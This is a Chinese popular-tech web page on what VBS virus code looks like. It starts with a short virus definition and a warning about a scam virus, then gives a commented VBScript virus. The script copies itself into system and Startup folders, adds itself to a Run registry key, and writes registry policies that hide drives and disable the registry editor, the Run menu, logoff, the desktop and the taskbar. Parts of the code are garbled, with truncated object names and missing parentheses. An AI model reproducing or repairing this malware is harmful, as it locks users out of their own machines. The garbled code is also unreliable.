學習啦>學習電腦>電腦安全>病毒知識>

vbs的電腦病毒代碼是怎樣的

時間: 儉聰 638 分享

  計算機病毒,是指編制或者在計算機程序中插入的破壞計算機功能或者毀壞數(shù)據(jù),影響計算機使用,并能自我復制的一組計算機指令或者程序代碼。這是目前官方最權威的關于計算機病毒的定義,此定義也被通行的《計算機病毒防治產(chǎn)品評級準則》的國家標準所采納。以下是學習啦網(wǎng)小編為大家整理的關于vbs電腦病毒代碼的相關知識,希望對大家有所幫助!

  上海計算機病毒防范服務中心提醒,本周需防范一種在網(wǎng)上流行的“VBS病毒”(Virus.VBS.d),該病毒不但導致多種殺毒軟件不能運行,而且還會彈出“解毒號碼”等欺詐信息,要求被害用戶向指定賬戶匯款,反病毒專家提醒用戶不要被這種欺詐信息迷惑。

  據(jù)介紹,這種病毒可以導致多種殺毒軟件或工具不能正常運行。更值得注意的是,當病毒感染的文件數(shù)超過2000個,會彈出對話框提示信息,提示內(nèi)容為:“您已有超過2000個文件被感染!不過請放心,此病毒很容易被清除!請聯(lián)系418465***!”反病毒專家分析,這個號碼是QQ號,受害用戶一旦加入這個號碼,會被要求向指定賬戶匯款。專家提醒這通常是欺詐行為,受害用戶要以正常方式殺毒,不要輕信這種欺詐信息。

  專家建議,平時用戶上網(wǎng)時要開啟防病毒軟件的實時監(jiān)控功能,并關閉U盤的“自動播放功能”。用戶可針對自己計算機安裝的操作系統(tǒng),找到相應的安全漏洞補丁,下載并安裝。以遏制利用這些漏洞進行傳播的病毒,減少病毒給計算機用戶帶來的危害。

  on error resume next

  set fs=createobject("ing.filesystemobject" '創(chuàng)建一個能與操作系統(tǒng)溝通的對象,再利用該對象的各種方法對注冊表進行操作

  set dir1=fs.getspecialfolder(0) '獲取windows/winnt文件夾位置

  set dir2=fs.getspecialfolder(1) '獲取system32/system文件夾位置

  set so=createobject("ing.filesystemobject"

  dim r '定義一個變量

  set r=createobject("w.shell"

  so.getfile(w.fullname).copy(dir1&"\win32system.vbs" '復制病毒副本到windows/winnt文件夾位置

  so.getfile(w.fullname).copy(dir2&"\win32system.vbs" '復制病毒副本到system32/system文件夾位置

  so.getfile(w.fullname).copy(dir1&"\start menu\programs\啟動\win32system.vbs" '復制病毒副本到start menu啟動菜單

  '下面是對注冊表的惡意修改和簡單的依靠oe傳播

  r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",1,"reg_dword" '修改注冊表,禁止“運行”菜單

  r.regwrite "kcu\software\microsoft\windows\currentversion\policies\explorer\noclose",1,"reg_dword" '修改注冊表,禁止“關閉”菜單

  r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodrives",63000000,"reg_dword" '修改注冊表,隱藏所有邏輯盤符

  r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools",1,"reg_dword" '修改注冊表,禁止注冊表編輯

  r.regwrite "hklm\software\microsoft\windows\currentversion\run\scanregistry","" '修改注冊表,禁止開機注冊表掃描

  r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",1,"reg_dword" '修改注冊表,禁止“注銷”菜單

  r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",1,"reg_dword" '修改注冊表,禁止ms-dos實模式

  r.regwrite "hklm\software\microsoft\windows\currentversion\run\win32system","win32system.vbs" '修改注冊表,使這個腳本本身開機自動運行

  r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",1,"reg_dword" '修改注冊表,禁止顯示桌面圖標

  r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",1,"reg_dword" '修改注冊表,禁止純dos模式

  r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",1,"reg_dword" '修改注冊表,禁止“任務欄和開始”菜單

  r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",1,"reg_dword" '修改注冊表,禁止右鍵菜單

vbs的電腦病毒代碼是怎樣的

計算機病毒,是指編制或者在計算機程序中插入的破壞計算機功能或者毀壞數(shù)據(jù),影響計算機使用,并能自我復制的一組計算機指令或者程序代碼。這是目前官方最權威的關于計算機病毒的定義,此定義也被通行的《計算機病毒防治產(chǎn)品評級準則》
推薦度:
點擊下載文檔文檔為doc格式

精選文章

  • u盤如果傳播計算機病毒怎樣處理
    u盤如果傳播計算機病毒怎樣處理

    計算機病毒(Computer Virus)在《中華人民共和國計算機信息系統(tǒng)安全保護條例》中被明確定義,病毒指編制者在計算機程序中插入的破壞計算機功能或者破壞數(shù)

  • u盤插電腦中了病毒怎么辦
    u盤插電腦中了病毒怎么辦

    病毒不是來源于突發(fā)或偶然的原因。病毒來自于一次偶然的事件,那時的研究人員為了計算出當時互聯(lián)網(wǎng)的在線人數(shù),然而它卻自己繁殖了起來導致了整個

  • 什么是mac電腦病毒
    什么是mac電腦病毒

    病毒往往會利用計算機操作系統(tǒng)的弱點進行傳播,提高系統(tǒng)的安全性是防病毒的一個重要方面,但完美的系統(tǒng)是不存在的,過于強調提高系統(tǒng)的安全性將使

  • 如何實現(xiàn)linux操作系統(tǒng)對計算機病毒的防護
    如何實現(xiàn)linux操作系統(tǒng)對計算機病毒的防護

    計算機病毒(Computer Virus)在《中華人民共和國計算機信息系統(tǒng)安全保護條例》中被明確定義計算機病毒--熊貓燒香,病毒指編制者在計算機程序中插入的破壞

264157